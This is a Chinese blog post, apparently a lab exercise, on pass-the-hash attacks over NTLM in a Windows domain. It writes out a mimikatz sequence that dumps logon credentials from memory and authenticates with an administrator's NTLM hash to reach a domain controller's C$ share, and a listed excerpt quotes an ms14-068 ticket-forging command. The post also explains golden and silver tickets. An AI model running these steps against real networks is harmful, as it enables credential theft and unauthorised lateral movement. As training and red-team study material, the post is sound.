内网渗透--基于ntlm协议的哈希传递

最新推荐文章于 2024-11-10 15:12:00 发布
最新推荐文章于 2024-11-10 15:12:00 发布
阅读量93 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/133863511
版权

1、使用哈希传递尝试查看域控C盘

cd C:\Users\zc\Desktop\mimikatz_trunk\x64
mimikatz.exe
privilege::debug 提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords 获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:qf.com/ntlm:a803cf45d87009c404eb89df4b1ae94c弹出新窗口
dir \\192.168.1.254\c$

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

2、画图解释ntlm协议通信流程
在这里插入图片描述

3、尝试回答面试题,你熟悉哪些内网渗透的手段,要求说明哈希传递的使用场景以及前提条件
基于ntlm协议的哈希传递,只针对相同密码的用户认证之间,不需要明文密码登录受害主机
基于Kerberos协议的黄金票据:伪造Kerberos协议通信过程中身份票据TGT,以用户身份访问用户所有服务
白银票据:伪造了 kerbores 协议通信过程中的服务票据,只能访问某一个具体的服务

红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 193
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 1837
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
内网渗透哈希传递
agrilly的博客
07-04 339
哈希算法、内网渗透、加密
[内网渗透]—NTLM网络认证及NTLM-Relay攻击
Sentiment的博客
12-16 1822
Windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证而当我们访问同一局域网的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。
内网渗透 - 哈希传递攻击
LuckySec
06-06 2471
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
内网渗透-哈希传递
qq_45953122的博客
10-18 458
哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。
内网渗透--哈希传递
m0_62202418的博客
11-28 1133
NTLM 协议主要用于在 Windows 网络环境中对用户进行身份验证,并且在许多企业网络中被广泛采用。哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。4.sekurlsa::logonpasswords ,获取内存中保存的登录信息。/ntlm:获取的NTLM
域渗透06-协议NTLM hash利用)
GalaxySpaceX的博客
11-07 391
协议NTLM hash利用)
内网渗透-完整的域渗透
热门推荐
Love&Share
11-28 1万+
文章目录域环境概念创建域创建组&用户加入域域渗透常规信息收集内网信息收集拿下20031.MySQL弱口令2.哈希传递攻击拿下域控信息收集mimikatz后渗透&其他MSF其他模块推荐阅读: 域环境 在开始域渗透之前,先来简单了解下域的一些概念 概念 域 域(Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个域中,一个域中的用户无法访问另一个域中的资源) 工作组的分散管理模式不适合大型的网络环境下工作,域模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和.
内网渗透测试小Demo-哈希传递攻击
Love&Share
11-26 2403
文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作 在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段 开机后手动设置IP地址为 10.0.0.2/24 ipconfig Win Server2008 虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.
哈希传递内网渗透
认真走好每一小步
07-25 369
哈希传递只有在相同密码的情况下有用!!!
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络中进行非法活动。 Kerberos协议是Windows域环境中的主要身份验证协议,它通过TGT(Ticket-Granting ...
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1519
内网环境下的横向移动总结
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 1975
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1552
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 523
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1396
信息安全工程师——操作系统安全概述篇
电子电气架构--- 实施基于以太网的安全车载网络
最新发布
Soly_kun的博客
11-10 730
电子电气架构--- 实施基于以太网的安全车载网络
【 AI写作鹅-注册安全分析报告-无验证方式导致安全隐患】
11-08 1187
合肥名阳信息技术有限公司成立于2016年,是一家专门从事移动互联网应用研发和运营的国家高新技术企业。公司坚持以用户为中心,打造富有吸引力的产品,满足移动互联网用户各项需求。公司产品涵盖:AI配音、AI写作、AiPPT、同声传译、文生视频,AI绘画、各种工具类应用,为消费者提供完善的办公、多媒体等领域的解决方案,秉承着专业、服务、高效、客户至上的原则,多年来致力于为用户提供服务新体验。
Windows LM-HashNTLM-Hash详解及Python模拟
"Windows下LM-HashNTLM-Hash的生成原理及Python模拟" Windows操作系统中,身份验证过程涉及到两种主要的哈希算法:LM (Lan Manager) HashNTLM (NT LAN Manager) Hash。这两种算法在早期版本的Windows系统中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值